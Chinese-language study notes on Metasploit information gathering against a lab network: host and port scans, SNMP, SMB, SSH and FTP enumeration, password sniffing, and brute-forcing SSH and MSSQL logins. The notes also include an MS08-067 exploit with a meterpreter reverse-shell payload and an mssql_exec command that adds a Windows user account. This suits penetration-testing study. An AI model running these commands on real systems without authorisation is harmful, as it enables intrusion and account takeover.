前言
本節學習信息收集
1、簡介
信息收集的模塊都在 auxiliary/scanner/ 之下
service postgresql start
msfconsole
msf > use auxiliary/scanner/ [TAB] #查看所有scanner
地址的使用方式
192.168.1.20-192.168.1.30、192.168.1.0/24,192.168.11.0/24
也可以編寫地址列表:file:/root/h.txt
2、db_nmap
跟 nmap 用法一樣,結果存放在 msf 的數據庫中
msf > db_nmap -sV 192.168.1.0/24
3、主機發現掃描
msf > search arp
msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(scanner/discovery/arp_sweep) > show options
msf auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.1.0/24
msf auxiliary(scanner/discovery/arp_sweep) > set INTERFACE eth0
msf auxiliary(scanner/discovery/arp_sweep) > set THREADS 20 #線程數
msf auxiliary(scanner/discovery/arp_sweep) > run
#跟上面nmap掃描結果一樣
4、端口掃描
msf > search portscan
msf > use auxiliary/scanner/portscan/syn #選擇syn掃描
msf auxiliary(scanner/portscan/syn) > show options
msf auxiliary(scanner/portscan/syn) > set INTERFACE eth0
msf auxiliary(scanner/portscan/syn) > set PORTS 80
msf auxiliary(scanner/portscan/syn) > set RHOSTS 192.168.1.0/24
msf auxiliary(scanner/portscan/syn) > set THREADS 50
msf auxiliary(scanner/portscan/syn) > run
5、殭屍掃描
查找 ipidseq 主機(查找殭屍機)
msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(scanner/ip/ipidseq) > show options
msf auxiliary(scanner/ip/ipidseq) > set RHOSTS 192.168.1.1-150
msf auxiliary(scanner/ip/ipidseq) > set THREADS 20
msf auxiliary(scanner/ip/ipidseq) > run
也可以用nmap
msf > db_nmap -PN -sI 192.168.1.110
6、UDP 掃描
msf > use auxiliary/scanner/discovery/udp_sweep
msf auxiliary(scanner/discovery/udp_sweep) > show options
msf auxiliary(scanner/discovery/udp_sweep) > set RHOSTS 192.168.1.1-150
msf auxiliary(scanner/discovery/udp_sweep) > run
這兩個有點不同
msf > use auxiliary/scanner/discovery/udp_probe
msf auxiliary(scanner/discovery/udp_probe) > show options
msf auxiliary(scanner/discovery/udp_probe) > set RHOSTS 192.168.1.1-150
msf auxiliary(scanner/discovery/udp_probe) > set CHOST 192.168.1.111
msf auxiliary(scanner/discovery/udp_probe) > set THREADS 20
msf auxiliary(scanner/discovery/udp_probe) > run
7、密碼嗅探
被動信息收集
支持從 pacap 抓包文件中提取密碼
功能類似於 dsniff
msf > search sniffer
msf > use auxiliary/sniffer/psnuffle
msf auxiliary(sniffer/psnuffle) > show options
msf auxiliary(sniffer/psnuffle) > set INTERFACE eth0
msf auxiliary(sniffer/psnuffle) > run
#也可以從pcap讀取
msf auxiliary(sniffer/psnuffle) > set PCAPFILE /root/ftp.pcapng
msf auxiliary(sniffer/psnuffle) > jobs
msf auxiliary(sniffer/psnuffle) > kill 0 #把之前的kill
msf auxiliary(sniffer/psnuffle) > run
8、SNMP掃描
對linux
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(scanner/snmp/snmp_login) > show options
msf auxiliary(scanner/snmp/snmp_login) > set RHOSTS 192.168.1.111
msf auxiliary(scanner/snmp/snmp_login) > set THREADS 20
msf auxiliary(scanner/snmp/snmp_login) > run
msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(scanner/snmp/snmp_enum) > show options
msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 192.168.1.111
msf auxiliary(scanner/snmp/snmp_enum) > run
對windows
msf > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(scanner/snmp/snmp_enumusers) > show options
msf auxiliary(scanner/snmp/snmp_enumusers) > set COMMUNITY jlcssadmin
msf auxiliary(scanner/snmp/snmp_enumusers) > set RHOSTS 192.168.1.112
msf auxiliary(scanner/snmp/snmp_enumusers) > run
msf > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(scanner/snmp/snmp_enumshares) > show options
msf auxiliary(scanner/snmp/snmp_enumshares) > set COMMUNITY jlcssadmin
msf auxiliary(scanner/snmp/snmp_enumshares) > set RHOSTS 192.168.1.112
msf auxiliary(scanner/snmp/snmp_enumshares) > run
9、SMB掃描
#版本掃描
msf > search smb
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > show options
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.122, 192.168.1.126
msf auxiliary(scanner/smb/smb_version) > run
msf auxiliary(scanner/smb/smb_version) > set SMBUSER Administrator
msf auxiliary(scanner/smb/smb_version) > set SMBPass 123456
msf auxiliary(scanner/smb/smb_version) > run
#掃描命令管道。判斷 SMB 服務類型(賬號、密碼)
msf > use auxiliary/scanner/smb/pipe_auditor
msf auxiliary(scanner/smb/pipe_auditor) > show options
msf auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/smb/pipe_auditor) > run
msf auxiliary(scanner/smb/pipe_auditor) > set SMBUser Administrator
msf auxiliary(scanner/smb/pipe_auditor) > set SMBPass 123456
msf auxiliary(scanner/smb/pipe_auditor) > run
#SMB 共享賬號(賬號、密碼)
msf > use auxiliary/scanner/smb/smb_enumshares
msf auxiliary(scanner/smb/smb_enumshares) > show options
msf auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/smb/smb_enumshares) > run
msf auxiliary(scanner/smb/smb_enumshares) > set SMBUser Administrator
msf auxiliary(scanner/smb/smb_enumshares) > set SMBPass 123456
msf auxiliary(scanner/smb/smb_enumshares) > run
#SMB 用戶枚舉(賬號、密碼)
msf > use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(scanner/smb/smb_enumusers) > show options
msf auxiliary(scanner/smb/smb_enumusers) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/smb/smb_enumusers) > run
#SID 枚舉(賬號、密碼)
msf > use auxiliary/scanner/smb/smb_lookupsid
msf auxiliary(scanner/smb/smb_lookupsid) > show options
msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/smb/smb_enumusers) > run
10、SSH掃描
#SSH 版本掃描
msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ssh/ssh_version) > run
#SSH 密碼爆破
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt #這是個現成的密碼字典
msf auxiliary(scanner/ssh/ssh_login) > set VERBOSE false
msf auxiliary(scanner/ssh/ssh_login) > run
#SSH 公鑰登陸
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set USERNAME root
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set KEY_PATH id_rsa_test_file
11、獲取 windows 缺少的補丁
基於已經取得的 session 進行檢測
若遇到報錯:known bug in WMI query, try migrating to another process
遷移到另一個進程再次進行嘗試
msf > use post/windows/gather/enum_patches
msf post(windows/gather/enum_patches) > set SESSION 4
msf post(windows/gather/enum_patches) >show advanced
msf post(windows/gather/enum_patches) > set VERBOSE yes
msf post(windows/gather/enum_patches) > run
#ms08-067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.1.126
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > run
12、mssql 掃描
mssql 掃描端口
默認端口:TCP 1422(動態端口)/ UDP 1434 (查詢 TCP 端口號)
#嘗試ping,確定端口
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/mssql/mssql_ping) > run
#爆破 mssql 密碼
msf > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(scanner/mssql/mssql_login) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/mssql/mssql_login) > set username Administrator
msf auxiliary(scanner/mssql/mssql_login) > set password ... #選擇一個密碼字典
msf auxiliary(scanner/mssql/mssql_login) > run
#遠程執行代碼(獲取數據庫權限之後)
msf > use auxiliary/admin/mssql/mssql_exec
msf auxiliary(scanner/mssql/mssql_exec) > set RHOSTS 192.168.1.114 #自己的kali
msf auxiliary(scanner/mssql/mssql_exec) > set username Administrator
msf auxiliary(scanner/mssql/mssql_exec) > set password ... #這裏是破解出來的密碼
msf auxiliary(scanner/mssql/mssql_exec) > set CMD net user user1 pass123 /ADD #執行代碼,在數據庫裏面加一個賬號
13、FTP 掃描
#查詢版本信息
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ftp/ftp_version) > run
#是否允許匿名登錄
msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ftp/anonymous) > run
#暴力破解
msf > use auxiliary/scanner/ftp/ftp_login
結語
可以發現
用msf進行信息收集的手段非常豐富
當然其中許多效果和原理都與之前學的類似